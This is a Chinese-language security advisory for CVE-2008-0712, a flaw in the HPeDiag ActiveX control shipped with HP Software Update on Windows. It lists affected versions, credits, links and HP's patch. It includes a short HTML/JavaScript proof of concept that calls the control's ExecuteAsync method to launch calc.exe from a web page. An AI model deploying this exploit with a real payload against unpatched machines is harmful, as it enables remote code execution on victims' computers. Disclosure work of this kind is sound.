发布日期：2008-04-24
更新日期：2008-04-25

受影响系统：

HP Software Update v 4.000.009.002

不受影响系统：

HP Software Update v 4.000.010.008

描述：

---

BUGTRAQ  ID: 28929
CVE(CAN) ID: CVE-2008-0712

HP软件更新是用于检查和下载HP产品固件、软件和驱动升级的HP应用程序，可帮助更新HP产品的安全性和功能性。

HP软件更新在Windows平台下所安装的HPeDiag ActiveX控件组件中的安全漏洞可能允许远程信息泄露和执行任意代码。

<*来源：Tan Chew Keong （chewkeong@security.org.sg）
  
  链接：http://secunia.com/advisories/29966/
        http://vuln.sg/hpupdate302991-en.html
        http://marc.info/?l=bugtraq&m=120907060320901&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<HTML>
<BODY>
<object id=boom classid="clsid:{B00FBC78-73CB-4216-8D01-96770CC020C3}"></object>
<SCRIPT language="javascript">


function Do_it()
{
  var Please = "c:\\windows\\system32\\calc.exe"
  var Give = "doest_matter"
  var Me = "c:\\"
  var Freedom  = 1;

  boom.ExecuteAsync (Please, Give, Me ,Freedom);
}


</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="Poc">
</BODY>
</HTML>

建议：

---

厂商补丁：

HP
--
HP已经为此发布了一个安全公告（HPSBGN02333）以及相应补丁:
HPSBGN02333：SSRT080031 rev.1 - HP Software Update HPeDiag Running on Windows, Remote Disclosure of Information and Execution of Arbitrary Code
链接：http://marc.info/?l=bugtraq&m=120907060320901&w=2

浏览次数：3625
严重程度：0（网友投票）